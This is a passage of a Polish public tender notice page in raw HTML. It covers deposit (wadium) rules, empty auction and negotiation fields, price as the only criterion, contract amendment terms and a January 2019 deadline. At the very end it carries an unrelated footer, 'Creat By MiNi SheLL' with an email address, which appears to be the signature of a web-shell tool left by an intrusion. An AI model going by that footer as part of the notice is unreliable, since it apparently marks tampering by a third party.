najkorzystniejsza, z zastrzeżeniem akapitu poniżej (art. 46 ust. 4a ustawy Pzp).Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składani ofert.Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. 2018.1986), z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia o którym mowa w art. 25a ust.1 pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:1.	Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie.2.	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Wszelkie zmiany niniejszej umowy odbywać się będą zgodnie z zapisem art. 144 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r. i wymagają dla swojej ważności zachowania formy pisemnej. Zamawiający dopuszcza możliwość zmiany istotnych, w rozumieniu art. 144 ust. 1e ustawy Prawo zamówień publicznych, postanowień zawartej umowy w stosunku do treści oferty w następującym zakresie: a)	zmiany terminów realizacji zamówień jednostkowych z przyczyn organizacyjnych leżących po stronie Wykonawcy lub Zamawiającego.b)	zmiany ilości lub rodzaju zamawianego w ramach przedmiotu umowy asortymentu, wskazanego w załączniku nr 1 do umowy, na skutek zmiany ilości zatrudnienia przez Zamawiającego lub warunków pracy. c)	zmiany wysokości ceny wskazanej w umowie i ofercie Wykonawcy w przypadku zmiany ilości lub rodzaju zamawianego asortymentu,d)	zmiany wysokości ceny wskazanej w umowie i ofercie Wykonawcy w przypadku rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy na skutek zmiany ilości zatrudnienia przez Zamawiającego lub warunków pracy. e)	w zakresie zmiany wielkości ceny w zakresie wynikającym ze zmiany stawki podatku od towarów i usług [VAT] wynikającej ze zmiany przepisów powszechnie obowiązujących na terytorium Rzeczpospolitej Polskiej.f)	okresu obowiązywania umowy, spowodowanego niewyczerpaniem całkowitej ilości zamawianego w ramach przedmiotu umowy asortymentu, w terminie o którym mowa w §7, lub niewyczerpaniem kwoty o której mowa w §5 w terminie o którym mowa w §7 umowy;g)	zmiany terminu wykonania umowy lub zamówienia jednostkowego, w przypadku jakiegokolwiek opóźnienia, spowodowanego wystąpieniem siły wyższej to jest wyjątkowego wydarzenia lub okoliczności, na którą Strona nie ma wpływu, w tym w szczególności spowodowaną przez:- opóźnienia spowodowane przez organy administracji publicznej- akty terroryzmu- zamieszki, rozruchy, niepokoje, strajki lub lokaut z udziałem osób innych niż personel Wykonawcy lub inni pracownicy Wykonawcy,- amunicję wojskową, materiały wybuchowe, promieniowanie jonizujące lub skażenie radioaktywne, z wyłączeniem takich, które mogą być uznane za spowodowane przez używanie amunicji, materiałów wybuchowych, materiałów radioaktywnych lub promieniowania przez wykonawcę, oraz- katastrofy żywiołowe, m.in. takie, jak; trzęsienia ziemi, huragany, tajfuny lub długotrwałe ulewy, obfite opady śniegu, żałoba narodowa i mogą być one wprowadzone na pisemny wniosek Zamawiającego lub Wykonawcy.h) zmiany, zawartego w ofercie Wykonawcy, zakresu zobowiązań, które mogą być wykonane przez podwykonawców, jeżeli taka zmiana jest korzystna dla Zamawiającego lub uzasadniona jego interesem związanym z zachowaniem ciągłości dostaw, terminów wykonywania umowy, poprawy jakości wykonywania zobowiązań umownych lub gdy będzie to wynikać z konieczności zmiany sposobu realizacji dostaw przez Wykonawcę (w przypadku nie wskazania w ofercie zakresu prac powierzonych podwykonawcom - zmiany polegającej na wprowadzeniu możliwości wykonywania umowy przez podwykonawców pod warunkiem wskazania zakresu zobowiązań, które mogą być wykonane przez podwykonawców, jeżeli taka zmiana umowy jest korzystna dla Zamawiającego lub uzasadniona jego interesem związanym z zachowaniem ciągłości pracy, terminów wykonywania umowy, poprawy jakości wykonywania zobowiązań umownych lub gdy będzie to wynikać z konieczności zmiany sposobu realizacji zamówienia przez Wykonawcę).i) Zmiany w zakresie stosowania mechanizmu podzielonej płatności, na skutek zmian w powszechnie obowiązujących przepisach prawa,j) Zmiany rachunku bankowego Wykonawcy w przypadku dokonania przez niego zmiany rachunku bankowego dla prowadzonego przez niego przedsiębiorstwa.k) inne zmiany wynikające z art. 144 ustawy Prawo zamówień publicznych tj. art. 144 ust.1 pkt 2, ust.1 pkt 3, ust.1 pkt 4 lit. b i c, z zachowaniem warunków opisanych w uregulowaniu art. 144 ustawy. 2.	Zmiany muszą być wprowadzone z zachowaniem niżej opisanego trybu postępowania:a)	Zaproponować zmianę, przez złożenie pisemnej propozycji zmian, może Wykonawca lub Zamawiający. b)	Przedkładana drugiej stronie propozycja zmian będzie obejmowała opis proponowanych zmian i informację w jaki sposób zakładane zmiany wpłyną na realizację umowy.c)	Po otrzymaniu propozycji, Wykonawca albo Zamawiający (w zależności od przypadku) w terminie 7 dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany bądź w tym terminie wystąpi do strony występującej z propozycją zmian przesyłając zmodyfikowaną propozycję zmian spełniającą wymogi opisane wyżej. d)	W przypadku upływu terminu podanego w ust. 2 lit. c i nie uzyskania jednej z odpowiedzi tam opisanych, traktuje się iż propozycja wprowadzenia zmiany została odrzucona.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-01-23</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">13:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">j. polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com